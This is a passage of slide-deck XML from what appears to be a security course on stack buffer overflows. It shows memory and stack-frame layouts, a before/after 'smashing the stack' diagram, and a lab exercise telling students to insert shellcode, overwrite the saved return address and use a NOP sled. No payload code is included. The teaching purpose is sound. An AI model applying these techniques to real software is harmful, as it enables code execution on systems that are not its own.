          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="558" name="Google Shape;558;g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1257300"/>
              <a:ext cx="1421764" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="678180" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6325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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1935480"/>
              <a:ext cx="1421764" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="678180" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E46C0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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="2613660"/>
              <a:ext cx="1421764" cy="1828800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1828800" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="4442460"/>
              <a:ext cx="1421764" cy="739139"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="739139" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="739139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="739139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142123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2" name="Google Shape;562;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175177" y="1338076"/>
            <a:ext cx="9405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200">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="431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0xfffffffc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3" name="Google Shape;563;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660003" y="1355030"/>
            <a:ext cx="7575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Memory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4" name="Google Shape;564;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751459" y="1816055"/>
            <a:ext cx="5748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Kernel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5" name="Google Shape;565;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768193" y="1602699"/>
            <a:ext cx="19539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Operating System binary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6" name="Google Shape;566;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175177" y="2289765"/>
            <a:ext cx="9405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0xbffffffc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7" name="Google Shape;567;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797186" y="2289765"/>
            <a:ext cx="4833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8" name="Google Shape;568;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768193" y="2280879"/>
            <a:ext cx="15348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Dynamic Stack Data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9" name="Google Shape;569;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842913" y="5205685"/>
            <a:ext cx="3918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Heap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0" name="Google Shape;570;g24e5311e72c_0_441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768193" y="5280619"/>
            <a:ext cx="1451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Dynamic Vars/Data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71" name="Google Shape;571;g24e5311e72c_0_441"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5327903" y="1638300"/>
            <a:ext cx="1421764" cy="5016500"/>
            <a:chOff x="3880103" y="1257300"/>
            <a:chExt cx="1421764" cy="5016500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="572" name="Google Shape;572;g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1257300"/>
              <a:ext cx="1421764" cy="5016500"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="5016246"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="678180"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678180"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="1356360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="1356360"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="3185160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="3185160"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="3924300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="3924300"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5016246"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="2438400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="381000" y="342900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="342900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="285750" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="34290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E46C0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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="2438400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="0" y="342900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="E46C0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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="3962400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="285750" y="190500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="190500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="190500" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="19050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g24e5311e72c_0_441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="3962400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="381000" y="190500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="285750" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="190500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/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577" name="Google Shape;577;g24e5311e72c_0_441"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4156127" y="556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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1171575"/>
                <a:gridCol w="1421125"/>
                <a:gridCol w="1236975"/>
              </a:tblGrid>
              <a:tr h="24575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4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BSS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3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 Vars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</a:tr>
              <a:tr h="2667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 Data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</a:tr>
              <a:tr h="3251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0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0x08048000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Text Segment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Program binary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</a:tr>
              <a:tr h="2463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0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0x00000000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4e5311e72c_0_468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Stack Layout in Memory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Google Shape;584;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="1497285"/>
            <a:ext cx="2281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71957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Memory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0xfffffffc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85" name="Google Shape;585;g24e5311e72c_0_468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5251450" y="17081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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="67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Null Word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4061"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="45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Program Name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3735"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="67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Environment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7933C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="57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Arguments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04A7B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2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Stack Frame 1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Stack Frame 2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Stack Frame N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</a:tr>
              <a:tr h="73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sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="2365965"/>
            <a:ext cx="9405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0xbffffffc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7" name="Google Shape;587;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="2298659"/>
            <a:ext cx="27084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1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Static starting address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Name of program (e.g. /bin/ping)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8" name="Google Shape;588;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="3035259"/>
            <a:ext cx="2792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Environment variables (e.g. PATH)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9" name="Google Shape;589;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="3713439"/>
            <a:ext cx="2456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75">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="5080" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104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Program arguments (e.g. argc, argv[])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0" name="Google Shape;590;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="4290019"/>
            <a:ext cx="28758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Stack frame for each function call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1" name="Google Shape;591;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="4978359"/>
            <a:ext cx="1870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&lt;- ESP (Stack pointer)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2" name="Google Shape;592;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="5706065"/>
            <a:ext cx="9405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0x00000000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93" name="Google Shape;593;g24e5311e72c_0_468"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3060700" y="39687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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1428750"/>
              </a:tblGrid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Function Args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Ret. Address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Prev. EBP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</a:tr>
              <a:tr h="2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Local Variables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</a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3307640" y="3774399"/>
            <a:ext cx="9480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Stack Frame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5" name="Google Shape;595;g24e5311e72c_0_468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092256" y="3939499"/>
            <a:ext cx="8643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0xbfff????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6" name="Google Shape;596;g24e5311e72c_0_468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4038600"/>
            <a:ext cx="548639" cy="878839"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="878839" w="548639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="72925" y="1633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138454" y="6241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193973" y="13390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236867" y="22643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="45718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="393575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284118" y="405728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354666" y="425902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410185" y="433051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475714" y="437659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="439293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475714" y="440926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410185" y="445534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354666" y="452683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311772" y="461936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="485010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="832868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264521" y="845021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236867" y="855942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193973" y="865195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138454" y="872344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72925" y="876952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="878586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e5311e72c_0_6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22" name="Google Shape;122;g24e5311e72c_0_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Exploit a memory corruption vulnerability on a target system to execute arbitrary code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4e5311e72c_0_487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Shellcode Insertion (memcor/readData1)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471250" y="1331975"/>
            <a:ext cx="5250600" cy="5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Before/after “smashing the stack”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="604" name="Google Shape;604;g24e5311e72c_0_487"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3524250" y="20637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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1581150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Stack (Before)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&amp;fileName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Saved EIP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Saved EBP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&amp;filePointer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dataBuffer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dataBuffer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dataBuffer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dataBuffer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dataBuffer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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2591373" y="2153879"/>
            <a:ext cx="8643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1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0xfffffffc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6416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6" name="Google Shape;606;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2549456" y="3342599"/>
            <a:ext cx="8643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0xbfff????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7" name="Google Shape;607;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2549456" y="5328879"/>
            <a:ext cx="8643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0x00000000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08" name="Google Shape;608;g24e5311e72c_0_487"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7594598" y="2114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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1676400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Stack (After)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 Address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AAAA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AAAA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AAAA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AAAA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AAAA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AAAA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AAAA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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518848" y="2204679"/>
            <a:ext cx="8643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1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0xfffffffc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6416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0" name="Google Shape;610;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6476931" y="3393399"/>
            <a:ext cx="8643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0xbfff????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1" name="Google Shape;611;g24e5311e72c_0_487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309263" y="5173939"/>
            <a:ext cx="11994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1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Hint Address-&gt;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0x00000000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12" name="Google Shape;612;g24e5311e72c_0_487"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9334500" y="3508904"/>
            <a:ext cx="190500" cy="301625"/>
            <a:chOff x="7658100" y="3432704"/>
            <a:chExt cx="190500" cy="301625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="613" name="Google Shape;613;g24e5311e72c_0_48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58101" y="3593306"/>
              <a:ext cx="189269" cy="1404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4" name="Google Shape;614;g24e5311e72c_0_487"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7658100" y="3432704"/>
              <a:ext cx="190500" cy="301625"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="301625" w="190500">
                  <a:moveTo>
                    <a:pt x="190498" y="184414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180002" y="146185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150602" y="112961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105432" y="87220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47624" y="71438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47625" y="95249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="43920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47625" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47625" y="23811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105432" y="39593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150603" y="65335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180003" y="98559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190499" y="136787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190498" y="184414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180787" y="221294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153743" y="253324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112506" y="278582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60212" y="295146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="301095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52273" y="249005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99318" y="236361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138875" y="216662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168685" y="191034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186489" y="160601"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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4e5311e72c_0_504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Exercise: memcor/readData1/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Google Shape;621;g24e5311e72c_0_504"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1511350"/>
            <a:ext cx="10515600" cy="466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Objective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Insert your shellcode into program and overwrite return address to point to shellcode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Procedure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Compile and run program to get buffer address hint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make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./readData1 input.txt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Use python script “exploit.py” to generate your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploit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python3 exploit.py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Exploit the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Hint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./readData1 input.txt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where is your shellcode relative to the start of dataBuffer?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4e5311e72c_0_510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Congratulations!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;g24e5311e72c_0_5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You performed your first buffer overflow!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4e5311e72c_0_516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Game of Probability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Google Shape;635;g24e5311e72c_0_5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address of our shellcode was dependent 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The starting address of the stack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* Static 0xBFFFFFFF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Data on the stack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Program name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Environment variables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Program arguments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Current/previous stack frames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F44747"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad News</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: We may not always have access to this information and must resort to guessing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0AD414"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good news</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: We can drastically improve our odds of guessing correctly!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4e5311e72c_0_522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NOP Sled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;g24e5311e72c_0_522"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="82842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x86 NOP (No-op) instruction does……</a:t>
            </a:r>
            <a:r>
